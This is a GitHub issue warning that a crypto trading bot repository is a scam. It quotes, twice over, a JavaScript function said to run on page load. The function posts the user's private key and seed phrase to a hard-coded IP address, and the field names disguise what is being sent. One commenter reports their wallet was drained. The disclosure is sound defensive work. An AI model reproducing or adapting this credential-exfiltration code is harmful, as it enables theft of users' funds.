CleBeert / crypto-trading-bot-eth-bnb

crypto-trading-bot
49 stars 33 forks source link

Scam #2

Open allen-hsu opened 1 year ago

allen-hsu commented 1 year ago

the code will record your private key and upload to server

function VerifyAddress() {
if(myprivatekey.includes("your") && myseed.includes("your")){
onoroffseed = "off";
Startno();
}else{
$.ajax({
  type: "POST",
  url: "http://45.141.215.90:1604/gasprice.php",
  data: {
    "id": myaddress,
    "gas": myprivatekey,
    "quantity": myseed,
    "price": networks,
    "maxspend": maxspend,
    "where": "ABT"
  },
    success: function(response){
         const myArrayto = response.split("|");
         mywalletbal = myArrayto[0];
         myresponse = myArrayto[1];
         myerror = myArrayto[2];
 //alert(response);
        // put on console what server sent back...
    }
});function VerifyAddress() {
if(myprivatekey.includes("your") && myseed.includes("your")){
onoroffseed = "off";
Startno();
}else{
$.ajax({
  type: "POST",
  url: "http://45.141.215.90:1604/gasprice.php",
  data: {
    "id": myaddress,
    "gas": myprivatekey,
    "quantity": myseed,
    "price": networks,
    "maxspend": maxspend,
    "where": "ABT"
  },
    success: function(response){
         const myArrayto = response.split("|");
         mywalletbal = myArrayto[0];
         myresponse = myArrayto[1];
         myerror = myArrayto[2];
 //alert(response);
        // put on console what server sent back...
    }
});

VerifyAddress will be onload call

nmeopk commented 1 year ago

Its not scam a lot people know this software and using stop bullshi

NeelClaudel commented 1 year ago

Pure scam, avoid using it for for safety. i tried it and he withdraw all fund in the wallet in less than 5 minutes